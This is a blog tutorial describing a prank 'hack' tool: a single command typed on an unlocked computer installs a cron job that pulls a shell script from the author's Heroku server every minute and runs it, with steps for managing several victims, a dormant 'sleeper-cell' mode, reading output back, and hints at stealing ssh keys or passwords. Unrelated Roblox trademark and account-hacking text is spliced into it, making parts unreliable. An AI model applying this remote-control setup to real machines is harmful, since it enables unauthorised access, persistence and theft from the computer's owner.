by Chet Corcos
My friends often leave their computers open and unlocked. I tell them they should probably get in the habit of locking their computers, but they don’t listen to me. So I’ve created a simple project to hack my friends and show them the importance of computer security.
©2021 Roblox Corporation. Roblox, the Roblox logo and Powering Imagination are among our registered and unregistered trademarks in the U.S. And other countries. If you’re trying to hack back into your own account, you’ve probably lost the account forever. It’s no longer your account, or it never was in the first place. Anyone who says they can reset or retrieve your password or hack into someone else’s account for you should not be trusted.
All I need to do is wait for them to leave their computer unlocked for a few seconds, open up their terminal, and type a single, short command.
That’s it! Their computer is now infected and I can run whatever commands I want on this computer remotely. Pretty sweet, right? Or perhaps shocking?
Hacking is illegal. Specifically:
“intentionally access[ing] a computer without authorization or exceed[ing] authorized access” — The Computer Fraud and Abuse Act (18 U.S.C. 1030)
So keep in mind that the purpose of this article is to show you just how easy it would be for someone with bad intentions to hack you so you can avoid getting hacked yourself.
It doesn’t take some hacker genius to wreck your life — any “script kiddy” who can gain physical access to your computer can compromise you by downloading a script containing just 50 lines of code.
Getting Setup
All of the code for this project lives in this repository if you want to jump right in, but I’ll explain how it all works below.
First, you just need to clone the repo, install its dependencies, and symlink the hack command line interface (CLI) tool.
Next, you need to setup Heroku to host the scripts that will be running on your friends machine. If you’ve never used Heroku before, signup here (it’s free!) and set up their CLI tool on your machine.
Hack People Account On Roblox
Now inside the hack repo, create a Heroku app with an easy name to remember. I’m using hacker-chet.
Then you need to run a command to do a little setup. All it’s really doing is getting the root url for your Heroku website and putting it in your package.json. This way the server can inject the app url into the shell scripts.
You can start up the server locally if you want to hack yourself and test things out.
Or you can deploy to Heroku.
Now you’re ready to hack!
Hack API
The beauty of this program is that to start hacking someone, you just need to run a single command on their machine.
ROOT_URL is the specific path to your application. When you’re running the server locally, this will be localhost:5000 and when you deploy to Heroku, it will be something like <APP_NAME>.herokuapp.com.
What this does is sets up a cron job — a “chronological job” that reruns tasks at certain times — to ping the /env/live endpoint every minute and pipes the result to sh. It’s actually quite simple! And Heroku gives you HTTPS for free so its “secure” right?
Once you’ve hacked your friend, you can do everything else with the command line tool from your computer.
The hack tool has a concept of different hacked environments. When you hack someone using the /hack endpoint, that person starts off in the live environment. And for each environment, you can run a variety of different commands. I’ll demonstrate everything with a little walkthrough.
The following will rewrite the live environment shell script to execute the following command which will say aloud “I’m watching you.”
Well it’s not going to work yet, you still have to re-deploy to your Heroku app.
Now wait for the next minute and watch your friend’s computer ping your server by tailing the server logs.
The whole point of environments is so you can hack multiple people at the same time. To isolate people in different environments, you just need to change the name.
Next time the live environment is pinged, it will rewrite the cron job to start pinging the jon environment instead.
You can do everything the same just by changing the environment argument.
Now if you’ve had enough fun for the day and the party’s over, you can forget Jon and assure him that you’ve “unhacked” him.
This will erase the cron job from their computer. Or you might want to just put this environment in sleeper-cell mode so you can recover it later.
Now, rather than pinging your server every minute (the default), it will ping every day at midnight. And when you want to wake it back up, you can change the interval back to every minute and the next day, you’re good to go!
Some other fun things to do are setting up additional cron jobs. Here’s how you can wake your friend up at 6am every morning to remind him about computer security.
P.S. If you don’t remember how cron jobs work, this is a great resource. It pretty much all comes down to this little diagram.
One of my favorites is the desktop preset which will download an image from a given URL and set it as the background photo.
And if you’ve written a ton of cron jobs and you don’t know what’s on there anymore, you can use the dump command.
Now whip open your logs and you’ll see the output on the next ping. This is actually much more sinister now that you can get information back. If you wanted to be more nefarious, you can search for decrypted passwords or steal their ssh keys.
But if you just want to give him a good old-fashioned scare, send him a ransom message!
Lastly, if you find yourself adding a bunch of cron jobs and just want to start over, reset is here to help.
Now go have (responsible) fun with this thing and let me know what your favorite pranks are by submitting a pull request with a new command or preset!
Happy Hacking!